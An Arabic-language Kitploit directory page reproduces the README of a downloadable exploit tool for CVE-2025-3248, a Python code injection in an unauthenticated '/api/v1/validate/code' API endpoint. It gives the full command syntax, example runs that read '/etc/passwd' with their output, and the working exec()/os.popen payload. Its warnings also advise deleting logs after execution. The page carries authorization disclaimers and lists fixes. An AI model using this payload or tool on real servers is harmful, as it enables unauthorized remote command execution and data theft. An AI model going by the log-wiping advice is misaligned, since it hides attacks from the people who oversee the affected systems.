Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3248 — استغلال لـ CVE-2025-3248: يحقن حمولات Python مصممة في نقطة نهاية API للكود غير المصادق عليها لتنفيذ أوامر عشوائية على الخادم الهدف. | Kitploit
أدوات/GitHubGitHub/12-test-12/cve-2025-3248
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHub12-test-12/cve-2025-3248

CVE-2025-3248

استغلال لـ CVE-2025-3248: يحقن حمولات Python مصممة في نقطة نهاية API للكود غير المصادق عليها لتنفيذ أوامر عشوائية على الخادم الهدف.

عرض المستودع
2منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

توثيق أداة استغلال الثغرة CVE-2025-3248

مقدمة

هذه الأداة مُصمَّمة لاستغلال الثغرة CVE-2025-3248 (ثغرة حقن كود Python)، من خلال إنشاء حمولة ضارة (payload) لتحقيق تنفيذ أوامر عن بُعد (RCE) على الخادم الهدف. توجد الثغرة في واجهة برمجة تطبيقات (API) لتطبيق ويب معين، حيث يمكن للمهاجم استغلال نقطة تنفيذ كود غير موثقة لحقن أي كود Python.

تنبيه مهم:
هذه الأداة مخصصة فقط لاختبارات الاختراق المصرح بها. أي اختبار اختراق غير مصرح به قد ينتهك القوانين. تأكد من حصولك على تفويض صريح لاختبار النظام الهدف.

الميزات

✅ حقن كود Python ضار عبر واجهة /api/v1/validate/code
✅ دعم تنفيذ أي أوامر نظام (مثل whoami، ls، إلخ)
✅ مهلة زمنية قابلة للتخصيص (افتراضي 10 ثوانٍ)
✅ دعم تنسيقَي إخراج: نصي (text) / JSON
✅ معالجة أخطاء مفصّلة ومخرجات سجل

طريقة الاستخدام

الصيغة الأساسية

root@kitploit:~
تحرير

python cve-2025-3248.py -t <الهدف_URL> -c "<الأمر>" [خيارات]

شرح المعاملات

المعاملإلزاميالوصف
-t, --targetنعمURL الهدف (صيغة: http://ip:port)
-c, --commandنعمالأمر النظامي المراد تنفيذه (يُحاط بعلامات اقتباس)
-o, --outputلاتنسيق الإخراج (text/json، الافتراضي: text)
--timeoutلامهلة الطلب (بالثواني، الافتراضي: 10)
-v, --verboseلاعرض سجل التنفيذ المفصّل

أمثلة الاستخدام

مثال 1: تنفيذ الأمر whoami (بالتنسيق الافتراضي)

root@kitploit:~
تحرير

python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"

مثال للإخراج:

root@kitploit:~
تحرير

[+] تم تنفيذ الأمر بنجاح
--------------------------------------------------
www-data
--------------------------------------------------

مثال 2: إخراج بصيغة JSON + سجل مفصّل

root@kitploit:~
تحرير

python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v

مثال للإخراج:

root@kitploit:~
تحرير

{
  "status": 200,
  "content": "root:x:0:0:root:/root:/bin/bash\n...",
  "success": true
}

شرح مبسط لمبدأ الثغرة

  • تستقبل الخدمة المُستهدفة معامل code عبر واجهة /api/v1/validate/code
  • لا يُطبَّق أي تصفية أمنية على المُدخلات من جانب الخادم، بل يتم استخدام الدالة exec() لتنفيذ كود Python المُرسل مباشرة
  • يقوم المهاجم ببناء حمولة خاصة:
root@kitploit:~
تحرير

import os
@exec("raise Exception(os.popen('whoami').read())")
def f():
    pass
  • من خلال آلية معالجة الاستثناءات، يتم تشغيل os.popen() لتنفيذ أوامر النظام
  • خطورة الثغرة: قد تؤدي إلى السيطرة الكاملة على الخادم، مما يسمح بتنفيذ أي أوامر نظام، وسرقة بيانات حساسة، وزرع أبواب خلفية، إلخ.

تحذيرات أمنية

⚠️ هذه الأداة مخصصة فقط لاختبارات الاختراق المصرح بها ⚠️

  • المخاطر القانونية: استخدام هذه الأداة في اختبار اختراق دون الحصول على إذن صريح قد ينتهك قوانين مثل قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) وغيرها.
  • المخاطر النظامية: تنفيذ أوامر النظام قد يتسبب في تعطل الخدمة، فقدان البيانات، أو انهيار النظام.
  • مخاطر الكشف: قد يتم كشف سلوك الهجوم وتسجيله بواسطة جدران الحماية، أنظمة كشف التسلل (IDS/IPS).
  • نوصي بـ:
    • الاستخدام فقط في بيئات خاضعة للرقابة (مثل المختبرات، بيئات الاختبار المصرح بها)
    • استخدام المعامل -v لرؤية السجلات المفصّلة وتجنب الأخطاء
    • تنظيف الآثار فورًا بعد التنفيذ (مثل حذف السجلات، إغلاق الجلسات)

المتطلبات البيئية

  • Python 3.7+
  • مكتبة requests (يجب تثبيتها مسبقًا)
root@kitploit:~
تحرير

pip install requests

شرح معالجة الأخطاء

رمز الخطأالسببالحل
[-] تنسيق URL الهدف خاطئURL يفتقد إلى scheme أو hostتحقق من تنسيق URL (مثل http://127.0.0.1:8080)
[-] انتهاء مهلة الطلبالهدف لم يستجب خلال المهلةزد قيمة المعامل --timeout
[-] خطأ في الاتصالالهدف غير قابل للوصول/حظر بواسطة جدار الحمايةتحقق من الاتصال بالشبكة
[-] فشل تنفيذ الأمر (رمز HTTP: 403)رفض الإذن من جانب الخادمتأكد من أن الخدمة الهدف تسمح بتنفيذ الكود

تفاصيل تقنية

  • موقع الثغرة: واجهة POST /api/v1/validate/code
  • نوع الثغرة: حقن كود (Code Injection)
  • الإصدارات المتأثرة: غير محددة (يفترض البرنامج النصي وجود الثغرة في إصدار معين)
  • توصيات الإصلاح:
    • تطبيق تصفية صارمة على المدخلات (منع دوال مثل exec/eval)
    • تنفيذ الكود المُقدم من المستخدم في بيئة معزولة (sandbox)
    • تقييد صلاحيات واجهة API

إخلاء مسؤولية

هذا المستند مخصص فقط لأغراض البحث والتعليم الأمني. لا يتحمل المؤلف أي مسؤولية عن أي ضرر مباشر أو غير مباشر ناتج عن استخدام هذه الأداة. يرجى الالتزام بالقوانين واللوائح واستخدام أدوات الأمن بشكل قانوني.

تنزيل الأداة